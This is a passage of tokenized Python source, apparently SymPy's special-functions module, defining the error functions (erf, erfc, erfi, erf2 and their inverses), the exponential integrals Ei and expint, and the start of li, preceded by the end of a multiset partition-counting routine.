, k ) <EOL> if not isinstance ( n , _MultisetHistogram ) : <EOL> try : <EOL> u = len ( set ( n ) ) <EOL> if u == <NUM_LIT:1> : <EOL> return nT ( len ( n ) , k ) <EOL> elif u == len ( n ) : <EOL> n = range ( u ) <EOL> raise TypeError <EOL> except TypeError : <EOL> n = _multiset_histogram ( n ) <EOL> N = n [ _N ] <EOL> if k is None and N == <NUM_LIT:1> : <EOL> return <NUM_LIT:1> <EOL> if k in ( <NUM_LIT:1> , N ) : <EOL> return <NUM_LIT:1> <EOL> if k == <NUM_LIT:2> or N == <NUM_LIT:2> and k is None : <EOL> m , r = divmod ( N , <NUM_LIT:2> ) <EOL> rv = sum ( nC ( n , i ) for i in range ( <NUM_LIT:1> , m + <NUM_LIT:1> ) ) <EOL> if not r : <EOL> rv -= nC ( n , m ) // <NUM_LIT:2> <EOL> if k is None : <EOL> rv += <NUM_LIT:1> <EOL> return rv <EOL> if N == n [ _ITEMS ] : <EOL> if k is None : <EOL> return bell ( N ) <EOL> return stirling ( N , k ) <EOL> m = MultisetPartitionTraverser ( ) <EOL> if k is None : <EOL> return m . count_partitions ( n [ _M ] ) <EOL> tot = <NUM_LIT:0> <EOL> for discard in m . enum_range ( n [ _M ] , k - <NUM_LIT:1> , k ) : <EOL> tot += <NUM_LIT:1> <EOL> return tot </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core import Add , S , sympify , cacheit , pi , I <EOL> from sympy . core . function import Function , ArgumentIndexError <EOL> from sympy . core . symbol import Symbol <EOL> from sympy . functions . combinatorial . factorials import factorial <EOL> from sympy . functions . elementary . integers import floor <EOL> from sympy . functions . elementary . miscellaneous import sqrt , root <EOL> from sympy . functions . elementary . exponential import exp , log <EOL> from sympy . functions . elementary . complexes import polar_lift <EOL> from sympy . functions . elementary . hyperbolic import cosh , sinh <EOL> from sympy . functions . elementary . trigonometric import cos , sin , sinc <EOL> from sympy . functions . special . hyper import hyper , meijerg <EOL> from sympy . core . compatibility import range <EOL> class erf ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> unbranched = True <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return <NUM_LIT:2> * exp ( - self . args [ <NUM_LIT:0> ] ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def inverse ( self , argindex = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return erfinv <EOL> @ classmethod <EOL> def eval ( cls , arg ) : <EOL> if arg . is_Number : <EOL> if arg is S . NaN : <EOL> return S . NaN <EOL> elif arg is S . Infinity : <EOL> return S . One <EOL> elif arg is S . NegativeInfinity : <EOL> return S . NegativeOne <EOL> elif arg is S . Zero : <EOL> return S . Zero <EOL> if arg . func is erfinv : <EOL> return arg . args [ <NUM_LIT:0> ] <EOL> if arg . func is erfcinv : <EOL> return S . One - arg . args [ <NUM_LIT:0> ] <EOL> if arg . func is erf2inv and arg . args [ <NUM_LIT:0> ] is S . Zero : <EOL> return arg . args [ <NUM_LIT:1> ] <EOL> t = arg . extract_multiplicatively ( S . ImaginaryUnit ) <EOL> if t is S . Infinity or t is S . NegativeInfinity : <EOL> return arg <EOL> if arg . could_extract_minus_sign ( ) : <EOL> return - cls ( - arg ) <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n < <NUM_LIT:0> or n % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> k = floor ( ( n - <NUM_LIT:1> ) / S ( <NUM_LIT:2> ) ) <EOL> if len ( previous_terms ) > <NUM_LIT:2> : <EOL> return - previous_terms [ - <NUM_LIT:2> ] * x ** <NUM_LIT:2> * ( n - <NUM_LIT:2> ) / ( n * k ) <EOL> else : <EOL> return <NUM_LIT:2> * ( - <NUM_LIT:1> ) ** k * x ** n / ( n * factorial ( k ) * sqrt ( S . Pi ) ) <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return sqrt ( z ** <NUM_LIT:2> ) / z * ( S . One - uppergamma ( S . Half , z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) ) <EOL> def _eval_rewrite_as_fresnels ( self , z ) : <EOL> arg = ( S . One - S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return ( S . One + S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_fresnelc ( self , z ) : <EOL> arg = ( S . One - S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return ( S . One + S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return z / sqrt ( pi ) * meijerg ( [ S . Half ] , [ ] , [ <NUM_LIT:0> ] , [ - S . Half ] , z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return <NUM_LIT:2> * z / sqrt ( pi ) * hyper ( [ S . Half ] , [ <NUM_LIT:3> * S . Half ] , - z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return sqrt ( z ** <NUM_LIT:2> ) / z - z * expint ( S . Half , z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return S . One - _erfs ( z ) * exp ( - z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_erfc ( self , z ) : <EOL> return S . One - erfc ( z ) <EOL> def _eval_rewrite_as_erfi ( self , z ) : <EOL> return - I * erfi ( I * z ) <EOL> def _eval_as_leading_term ( self , x ) : <EOL> from sympy import Order <EOL> arg = self . args [ <NUM_LIT:0> ] . as_leading_term ( x ) <EOL> if x in arg . free_symbols and Order ( <NUM_LIT:1> , x ) . contains ( arg ) : <EOL> return <NUM_LIT:2> * x / sqrt ( pi ) <EOL> else : <EOL> return self . func ( arg ) <EOL> def as_real_imag ( self , deep = True , ** hints ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_real : <EOL> if deep : <EOL> hints [ '<STR_LIT>' ] = False <EOL> return ( self . expand ( deep , ** hints ) , S . Zero ) <EOL> else : <EOL> return ( self , S . Zero ) <EOL> if deep : <EOL> x , y = self . args [ <NUM_LIT:0> ] . expand ( deep , ** hints ) . as_real_imag ( ) <EOL> else : <EOL> x , y = self . args [ <NUM_LIT:0> ] . as_real_imag ( ) <EOL> sq = - y ** <NUM_LIT:2> / x ** <NUM_LIT:2> <EOL> re = S . Half * ( self . func ( x + x * sqrt ( sq ) ) + self . func ( x - x * sqrt ( sq ) ) ) <EOL> im = x / ( <NUM_LIT:2> * y ) * sqrt ( sq ) * ( self . func ( x - x * sqrt ( sq ) ) - <EOL> self . func ( x + x * sqrt ( sq ) ) ) <EOL> return ( re , im ) <EOL> class erfc ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> unbranched = True <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return - <NUM_LIT:2> * exp ( - self . args [ <NUM_LIT:0> ] ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def inverse ( self , argindex = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return erfcinv <EOL> @ classmethod <EOL> def eval ( cls , arg ) : <EOL> if arg . is_Number : <EOL> if arg is S . NaN : <EOL> return S . NaN <EOL> elif arg is S . Infinity : <EOL> return S . Zero <EOL> elif arg is S . Zero : <EOL> return S . One <EOL> if arg . func is erfinv : <EOL> return S . One - arg . args [ <NUM_LIT:0> ] <EOL> if arg . func is erfcinv : <EOL> return arg . args [ <NUM_LIT:0> ] <EOL> t = arg . extract_multiplicatively ( S . ImaginaryUnit ) <EOL> if t is S . Infinity or t is S . NegativeInfinity : <EOL> return - arg <EOL> if arg . could_extract_minus_sign ( ) : <EOL> return S ( <NUM_LIT:2> ) - cls ( - arg ) <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n == <NUM_LIT:0> : <EOL> return S . One <EOL> elif n < <NUM_LIT:0> or n % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> k = floor ( ( n - <NUM_LIT:1> ) / S ( <NUM_LIT:2> ) ) <EOL> if len ( previous_terms ) > <NUM_LIT:2> : <EOL> return - previous_terms [ - <NUM_LIT:2> ] * x ** <NUM_LIT:2> * ( n - <NUM_LIT:2> ) / ( n * k ) <EOL> else : <EOL> return - <NUM_LIT:2> * ( - <NUM_LIT:1> ) ** k * x ** n / ( n * factorial ( k ) * sqrt ( S . Pi ) ) <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return self . rewrite ( erf ) . rewrite ( "<STR_LIT>" , deep = True ) <EOL> def _eval_rewrite_as_erf ( self , z ) : <EOL> return S . One - erf ( z ) <EOL> def _eval_rewrite_as_erfi ( self , z ) : <EOL> return S . One + I * erfi ( I * z ) <EOL> def _eval_rewrite_as_fresnels ( self , z ) : <EOL> arg = ( S . One - S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return S . One - ( S . One + S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_fresnelc ( self , z ) : <EOL> arg = ( S . One - S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return S . One - ( S . One + S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return S . One - z / sqrt ( pi ) * meijerg ( [ S . Half ] , [ ] , [ <NUM_LIT:0> ] , [ - S . Half ] , z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return S . One - <NUM_LIT:2> * z / sqrt ( pi ) * hyper ( [ S . Half ] , [ <NUM_LIT:3> * S . Half ] , - z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return S . One - sqrt ( z ** <NUM_LIT:2> ) / z * ( S . One - uppergamma ( S . Half , z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) ) <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return S . One - sqrt ( z ** <NUM_LIT:2> ) / z + z * expint ( S . Half , z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> def _eval_as_leading_term ( self , x ) : <EOL> from sympy import Order <EOL> arg = self . args [ <NUM_LIT:0> ] . as_leading_term ( x ) <EOL> if x in arg . free_symbols and Order ( <NUM_LIT:1> , x ) . contains ( arg ) : <EOL> return S . One <EOL> else : <EOL> return self . func ( arg ) <EOL> def as_real_imag ( self , deep = True , ** hints ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_real : <EOL> if deep : <EOL> hints [ '<STR_LIT>' ] = False <EOL> return ( self . expand ( deep , ** hints ) , S . Zero ) <EOL> else : <EOL> return ( self , S . Zero ) <EOL> if deep : <EOL> x , y = self . args [ <NUM_LIT:0> ] . expand ( deep , ** hints ) . as_real_imag ( ) <EOL> else : <EOL> x , y = self . args [ <NUM_LIT:0> ] . as_real_imag ( ) <EOL> sq = - y ** <NUM_LIT:2> / x ** <NUM_LIT:2> <EOL> re = S . Half * ( self . func ( x + x * sqrt ( sq ) ) + self . func ( x - x * sqrt ( sq ) ) ) <EOL> im = x / ( <NUM_LIT:2> * y ) * sqrt ( sq ) * ( self . func ( x - x * sqrt ( sq ) ) - <EOL> self . func ( x + x * sqrt ( sq ) ) ) <EOL> return ( re , im ) <EOL> class erfi ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> unbranched = True <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return <NUM_LIT:2> * exp ( self . args [ <NUM_LIT:0> ] ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z . is_Number : <EOL> if z is S . NaN : <EOL> return S . NaN <EOL> elif z is S . Zero : <EOL> return S . Zero <EOL> elif z is S . Infinity : <EOL> return S . Infinity <EOL> if z . could_extract_minus_sign ( ) : <EOL> return - cls ( - z ) <EOL> nz = z . extract_multiplicatively ( I ) <EOL> if nz is not None : <EOL> if nz is S . Infinity : <EOL> return I <EOL> if nz . func is erfinv : <EOL> return I * nz . args [ <NUM_LIT:0> ] <EOL> if nz . func is erfcinv : <EOL> return I * ( S . One - nz . args [ <NUM_LIT:0> ] ) <EOL> if nz . func is erf2inv and nz . args [ <NUM_LIT:0> ] is S . Zero : <EOL> return I * nz . args [ <NUM_LIT:1> ] <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n < <NUM_LIT:0> or n % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> k = floor ( ( n - <NUM_LIT:1> ) / S ( <NUM_LIT:2> ) ) <EOL> if len ( previous_terms ) > <NUM_LIT:2> : <EOL> return previous_terms [ - <NUM_LIT:2> ] * x ** <NUM_LIT:2> * ( n - <NUM_LIT:2> ) / ( n * k ) <EOL> else : <EOL> return <NUM_LIT:2> * x ** n / ( n * factorial ( k ) * sqrt ( S . Pi ) ) <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return self . rewrite ( erf ) . rewrite ( "<STR_LIT>" , deep = True ) <EOL> def _eval_rewrite_as_erf ( self , z ) : <EOL> return - I * erf ( I * z ) <EOL> def _eval_rewrite_as_erfc ( self , z ) : <EOL> return I * erfc ( I * z ) - I <EOL> def _eval_rewrite_as_fresnels ( self , z ) : <EOL> arg = ( S . One + S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return ( S . One - S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_fresnelc ( self , z ) : <EOL> arg = ( S . One + S . ImaginaryUnit ) * z / sqrt ( pi ) <EOL> return ( S . One - S . ImaginaryUnit ) * ( fresnelc ( arg ) - I * fresnels ( arg ) ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return z / sqrt ( pi ) * meijerg ( [ S . Half ] , [ ] , [ <NUM_LIT:0> ] , [ - S . Half ] , - z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return <NUM_LIT:2> * z / sqrt ( pi ) * hyper ( [ S . Half ] , [ <NUM_LIT:3> * S . Half ] , z ** <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return sqrt ( - z ** <NUM_LIT:2> ) / z * ( uppergamma ( S . Half , - z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) - S . One ) <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return sqrt ( - z ** <NUM_LIT:2> ) / z - z * expint ( S . Half , - z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> def as_real_imag ( self , deep = True , ** hints ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_real : <EOL> if deep : <EOL> hints [ '<STR_LIT>' ] = False <EOL> return ( self . expand ( deep , ** hints ) , S . Zero ) <EOL> else : <EOL> return ( self , S . Zero ) <EOL> if deep : <EOL> x , y = self . args [ <NUM_LIT:0> ] . expand ( deep , ** hints ) . as_real_imag ( ) <EOL> else : <EOL> x , y = self . args [ <NUM_LIT:0> ] . as_real_imag ( ) <EOL> sq = - y ** <NUM_LIT:2> / x ** <NUM_LIT:2> <EOL> re = S . Half * ( self . func ( x + x * sqrt ( sq ) ) + self . func ( x - x * sqrt ( sq ) ) ) <EOL> im = x / ( <NUM_LIT:2> * y ) * sqrt ( sq ) * ( self . func ( x - x * sqrt ( sq ) ) - <EOL> self . func ( x + x * sqrt ( sq ) ) ) <EOL> return ( re , im ) <EOL> class erf2 ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> def fdiff ( self , argindex ) : <EOL> x , y = self . args <EOL> if argindex == <NUM_LIT:1> : <EOL> return - <NUM_LIT:2> * exp ( - x ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> elif argindex == <NUM_LIT:2> : <EOL> return <NUM_LIT:2> * exp ( - y ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> @ classmethod <EOL> def eval ( cls , x , y ) : <EOL> I = S . Infinity <EOL> N = S . NegativeInfinity <EOL> O = S . Zero <EOL> if x is S . NaN or y is S . NaN : <EOL> return S . NaN <EOL> elif x == y : <EOL> return S . Zero <EOL> elif ( x is I or x is N or x is O ) or ( y is I or y is N or y is O ) : <EOL> return erf ( y ) - erf ( x ) <EOL> if y . func is erf2inv and y . args [ <NUM_LIT:0> ] == x : <EOL> return y . args [ <NUM_LIT:1> ] <EOL> sign_x = x . could_extract_minus_sign ( ) <EOL> sign_y = y . could_extract_minus_sign ( ) <EOL> if ( sign_x and sign_y ) : <EOL> return - cls ( - x , - y ) <EOL> elif ( sign_x or sign_y ) : <EOL> return erf ( y ) - erf ( x ) <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) , self . args [ <NUM_LIT:1> ] . conjugate ( ) ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real and self . args [ <NUM_LIT:1> ] . is_real <EOL> def _eval_rewrite_as_erf ( self , x , y ) : <EOL> return erf ( y ) - erf ( x ) <EOL> def _eval_rewrite_as_erfc ( self , x , y ) : <EOL> return erfc ( x ) - erfc ( y ) <EOL> def _eval_rewrite_as_erfi ( self , x , y ) : <EOL> return I * ( erfi ( I * x ) - erfi ( I * y ) ) <EOL> def _eval_rewrite_as_fresnels ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( fresnels ) - erf ( x ) . rewrite ( fresnels ) <EOL> def _eval_rewrite_as_fresnelc ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( fresnelc ) - erf ( x ) . rewrite ( fresnelc ) <EOL> def _eval_rewrite_as_meijerg ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( meijerg ) - erf ( x ) . rewrite ( meijerg ) <EOL> def _eval_rewrite_as_hyper ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( hyper ) - erf ( x ) . rewrite ( hyper ) <EOL> def _eval_rewrite_as_uppergamma ( self , x , y ) : <EOL> from sympy import uppergamma <EOL> return ( sqrt ( y ** <NUM_LIT:2> ) / y * ( S . One - uppergamma ( S . Half , y ** <NUM_LIT:2> ) / sqrt ( S . Pi ) ) - <EOL> sqrt ( x ** <NUM_LIT:2> ) / x * ( S . One - uppergamma ( S . Half , x ** <NUM_LIT:2> ) / sqrt ( S . Pi ) ) ) <EOL> def _eval_rewrite_as_expint ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( expint ) - erf ( x ) . rewrite ( expint ) <EOL> class erfinv ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return sqrt ( S . Pi ) * exp ( self . func ( self . args [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> ) * S . Half <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def inverse ( self , argindex = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return erf <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . NaN : <EOL> return S . NaN <EOL> elif z is S . NegativeOne : <EOL> return S . NegativeInfinity <EOL> elif z is S . Zero : <EOL> return S . Zero <EOL> elif z is S . One : <EOL> return S . Infinity <EOL> if ( z . func is erf ) and z . args [ <NUM_LIT:0> ] . is_real : <EOL> return z . args [ <NUM_LIT:0> ] <EOL> nz = z . extract_multiplicatively ( - <NUM_LIT:1> ) <EOL> if nz is not None and ( ( nz . func is erf ) and ( nz . args [ <NUM_LIT:0> ] ) . is_real ) : <EOL> return - nz . args [ <NUM_LIT:0> ] <EOL> def _eval_rewrite_as_erfcinv ( self , z ) : <EOL> return erfcinv ( <NUM_LIT:1> - z ) <EOL> class erfcinv ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return - sqrt ( S . Pi ) * exp ( self . func ( self . args [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> ) * S . Half <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def inverse ( self , argindex = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return erfc <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . NaN : <EOL> return S . NaN <EOL> elif z is S . Zero : <EOL> return S . Infinity <EOL> elif z is S . One : <EOL> return S . Zero <EOL> elif z == <NUM_LIT:2> : <EOL> return S . NegativeInfinity <EOL> def _eval_rewrite_as_erfinv ( self , z ) : <EOL> return erfinv ( <NUM_LIT:1> - z ) <EOL> class erf2inv ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> def fdiff ( self , argindex ) : <EOL> x , y = self . args <EOL> if argindex == <NUM_LIT:1> : <EOL> return exp ( self . func ( x , y ) ** <NUM_LIT:2> - x ** <NUM_LIT:2> ) <EOL> elif argindex == <NUM_LIT:2> : <EOL> return sqrt ( S . Pi ) * S . Half * exp ( self . func ( x , y ) ** <NUM_LIT:2> ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> @ classmethod <EOL> def eval ( cls , x , y ) : <EOL> if x is S . NaN or y is S . NaN : <EOL> return S . NaN <EOL> elif x is S . Zero and y is S . Zero : <EOL> return S . Zero <EOL> elif x is S . Zero and y is S . One : <EOL> return S . Infinity <EOL> elif x is S . One and y is S . Zero : <EOL> return S . One <EOL> elif x is S . Zero : <EOL> return erfinv ( y ) <EOL> elif x is S . Infinity : <EOL> return erfcinv ( - y ) <EOL> elif y is S . Zero : <EOL> return x <EOL> elif y is S . Infinity : <EOL> return erfinv ( x ) <EOL> class Ei ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if not z . is_polar and z . is_negative : <EOL> return Ei ( polar_lift ( z ) ) - pi * I <EOL> nz , n = z . extract_branch_factor ( ) <EOL> if n : <EOL> return Ei ( nz ) + <NUM_LIT:2> * I * pi * n <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> from sympy import unpolarify <EOL> arg = unpolarify ( self . args [ <NUM_LIT:0> ] ) <EOL> if argindex == <NUM_LIT:1> : <EOL> return exp ( arg ) / arg <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_evalf ( self , prec ) : <EOL> if ( self . args [ <NUM_LIT:0> ] / polar_lift ( - <NUM_LIT:1> ) ) . is_positive : <EOL> return Function . _eval_evalf ( self , prec ) + ( I * pi ) . _eval_evalf ( prec ) <EOL> return Function . _eval_evalf ( self , prec ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return - uppergamma ( <NUM_LIT:0> , polar_lift ( - <NUM_LIT:1> ) * z ) - I * pi <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return - expint ( <NUM_LIT:1> , polar_lift ( - <NUM_LIT:1> ) * z ) - I * pi <EOL> def _eval_rewrite_as_li ( self , z ) : <EOL> if isinstance ( z , log ) : <EOL> return li ( z . args [ <NUM_LIT:0> ] ) <EOL> return li ( exp ( z ) ) <EOL> def _eval_rewrite_as_Si ( self , z ) : <EOL> return Shi ( z ) + Chi ( z ) <EOL> _eval_rewrite_as_Ci = _eval_rewrite_as_Si <EOL> _eval_rewrite_as_Chi = _eval_rewrite_as_Si <EOL> _eval_rewrite_as_Shi = _eval_rewrite_as_Si <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return exp ( z ) * _eis ( z ) <EOL> def _eval_nseries ( self , x , n , logx ) : <EOL> x0 = self . args [ <NUM_LIT:0> ] . limit ( x , <NUM_LIT:0> ) <EOL> if x0 is S . Zero : <EOL> f = self . _eval_rewrite_as_Si ( * self . args ) <EOL> return f . _eval_nseries ( x , n , logx ) <EOL> return super ( Ei , self ) . _eval_nseries ( x , n , logx ) <EOL> class expint ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , nu , z ) : <EOL> from sympy import ( unpolarify , expand_mul , uppergamma , exp , gamma , <EOL> factorial ) <EOL> nu2 = unpolarify ( nu ) <EOL> if nu != nu2 : <EOL> return expint ( nu2 , z ) <EOL> if nu . is_Integer and nu <= <NUM_LIT:0> or ( not nu . is_Integer and ( <NUM_LIT:2> * nu ) . is_Integer ) : <EOL> return unpolarify ( expand_mul ( z ** ( nu - <NUM_LIT:1> ) * uppergamma ( <NUM_LIT:1> - nu , z ) ) ) <EOL> z , n = z . extract_branch_factor ( ) <EOL> if n == <NUM_LIT:0> : <EOL> return <EOL> if nu . is_integer : <EOL> if ( nu > <NUM_LIT:0> ) != True : <EOL> return <EOL> return expint ( nu , z ) - <NUM_LIT:2> * pi * I * n * ( - <NUM_LIT:1> ) ** ( nu - <NUM_LIT:1> ) / factorial ( nu - <NUM_LIT:1> ) * unpolarify ( z ) ** ( nu - <NUM_LIT:1> ) <EOL> else : <EOL> return ( exp ( <NUM_LIT:2> * I * pi * nu * n ) - <NUM_LIT:1> ) * z ** ( nu - <NUM_LIT:1> ) * gamma ( <NUM_LIT:1> - nu ) + expint ( nu , z ) <EOL> def fdiff ( self , argindex ) : <EOL> from sympy import meijerg <EOL> nu , z = self . args <EOL> if argindex == <NUM_LIT:1> : <EOL> return - z ** ( nu - <NUM_LIT:1> ) * meijerg ( [ ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> - nu ] , [ ] , z ) <EOL> elif argindex == <NUM_LIT:2> : <EOL> return - expint ( nu - <NUM_LIT:1> , z ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_rewrite_as_uppergamma ( self , nu , z ) : <EOL> from sympy import uppergamma <EOL> return z ** ( nu - <NUM_LIT:1> ) * uppergamma ( <NUM_LIT:1> - nu , z ) <EOL> def _eval_rewrite_as_Ei ( self , nu , z ) : <EOL> from sympy import exp_polar , unpolarify , exp , factorial <EOL> if nu == <NUM_LIT:1> : <EOL> return - Ei ( z * exp_polar ( - I * pi ) ) - I * pi <EOL> elif nu . is_Integer and nu > <NUM_LIT:1> : <EOL> x = - unpolarify ( z ) <EOL> return x ** ( nu - <NUM_LIT:1> ) / factorial ( nu - <NUM_LIT:1> ) * E1 ( z ) . rewrite ( Ei ) + exp ( x ) / factorial ( nu - <NUM_LIT:1> ) * Add ( * [ factorial ( nu - k - <NUM_LIT:2> ) * x ** k for k in range ( nu - <NUM_LIT:1> ) ] ) <EOL> else : <EOL> return self <EOL> def _eval_expand_func ( self , ** hints ) : <EOL> return self . rewrite ( Ei ) . rewrite ( expint , ** hints ) <EOL> def _eval_rewrite_as_Si ( self , nu , z ) : <EOL> if nu != <NUM_LIT:1> : <EOL> return self <EOL> return Shi ( z ) - Chi ( z ) <EOL> _eval_rewrite_as_Ci = _eval_rewrite_as_Si <EOL> _eval_rewrite_as_Chi = _eval_rewrite_as_Si <EOL> _eval_rewrite_as_Shi = _eval_rewrite_as_Si <EOL> def _eval_nseries ( self , x , n , logx ) : <EOL> if not self . args [ <NUM_LIT:0> ] . has ( x ) : <EOL> nu = self . args [ <NUM_LIT:0> ] <EOL> if nu == <NUM_LIT:1> : <EOL> f = self . _eval_rewrite_as_Si ( * self . args ) <EOL> return f . _eval_nseries ( x , n , logx ) <EOL> elif nu . is_Integer and nu > <NUM_LIT:1> : <EOL> f = self . _eval_rewrite_as_Ei ( * self . args ) <EOL> return f . _eval_nseries ( x , n , logx ) <EOL> return super ( expint , self ) . _eval_nseries ( x , n , logx ) <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . exp_integral_e ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) , self . args [ <NUM_LIT:1> ] . _sage_ ( ) ) <EOL> def E1 ( z ) : <EOL> """<STR_LIT>""" <EOL> return expint ( <NUM_LIT:1> , z ) <EOL> class li ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . Zero : <EOL> return S . Zero <EOL> elif z is S . One : <EOL> return S . NegativeInfinity <EOL> elif z is S . Infinity : <EOL> return S . Infinity <EOL> def fdiff ( self , argindex = 